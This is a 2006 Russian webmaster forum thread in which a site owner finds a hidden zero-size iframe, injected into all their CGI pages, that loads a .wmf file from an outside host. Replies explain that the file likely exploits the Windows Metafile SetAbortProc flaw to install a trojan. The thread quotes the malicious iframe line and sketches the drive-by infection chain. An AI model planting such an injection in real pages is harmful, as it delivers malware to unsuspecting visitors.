Саша,зачем ты литр водки взял?
С нами с 23.12.05
Сообщения: 1372
Рейтинг: 737
|
 Добавлено: 28/03/06 в 19:21 |
Сабж, поставили на все сиджи такой ифрейм:
<iframe height=0 width=0 src="хттп://onlyfree.de/yabbfiles/menu.wmf"></iframe>
как узнать, что в ифрейме этом? Может партнёрка.. чтобы абузу написать
|
|
|
|
| |
С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010
 
|
| Добавлено: 28/03/06 в 19:30 |
menu.wmf - это графический файл, через который можно загрузить трояна в винду.
| Цитата: | Уязвимость в обработке Windows Metafile (WMF) и Enhanced Metafile (EMF) способна привести к внедрению произвольного кода на удаленную систему - достаточно прислать жертве соответствующим образом подготовленное изображение. Подвержены все системы семейства NT, пользователи '98 и ME могут спать спокойно.
|
| Цитата: |
MS рассказывает об истоках WMF-уязвимости
Всей истории уже сильно больше 15 лет. Во времена кооперативной многозадачности функциональность
SetAbortProc и callback-функций была необходимым компонентом для обеспечения возможности прерывания
печати - даже до появления метафайлов. В районе 90-го года поддержка wmf была добавлена в Windows 3.0, а
функциональность SetAbortProc подправлена для того, чтобы она понимала, когда вызвана из метафайла. В те
времена отношение к безопасности было совершенно другим, и метафайлы воспринимались как источник,
заслуживающий полного доверия от ОС.
Потенциальная опасность записей типа META_ESCAPE, приводящих к вызову SetAbortProc, была замечена чуть
позже, и ряд приложений (включая IE) стал их просто игнорировать, так что простое подсовывание
web-пользователю wmf-файла не приведет ни к каким проблемам. Однако осталась возможность косвенного их
срабатывания - например, с помощью Windows Picture and Fax Viewer (тот самый shimgvw.dll), который
конвертирует "чистый" WMF в EMF, честно обрабатывая ту самую злосчастную запись. Собственно говоря, все
существующие схемы атаки на данную уязвимости используют тег IFRAME, передающий этот файл оболочке, в
которой просмотрщиком wmf-файлов по умолчанию является как раз Windows Picture and Fax Viewer.
|
|
|
|
|
| |
С нами с 12.06.04
Сообщения: 267
Рейтинг: 246
|
| Добавлено: 28/03/06 в 20:10 |
твои абузы никто читать не будет.
файл уже видимо снесли.
|
|
|
|
| |
Jazz Jazz Jazz
С нами с 03.08.04
Сообщения: 4429
Рейтинг: 2605
|
| Добавлено: 09/04/06 в 03:24 |
дайлер там какой-то скорее всего был,с тулбаром напару
|
|
|
|
| |
Дизайн, вёрстка, то сё
С нами с 16.10.02
Сообщения: 4875
Рейтинг: 3947
|
| Добавлено: 09/04/06 в 09:30 |
| --Alias-- писал: | | дайлер там какой-то скорее всего был,с тулбаром напару |
еще недели через две подними топик
предположи что ещё могло там быть кроме дайлера и тулбара
если ты в сигу добавишь слово "ХУЙ" она будет ещё больше заметна
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
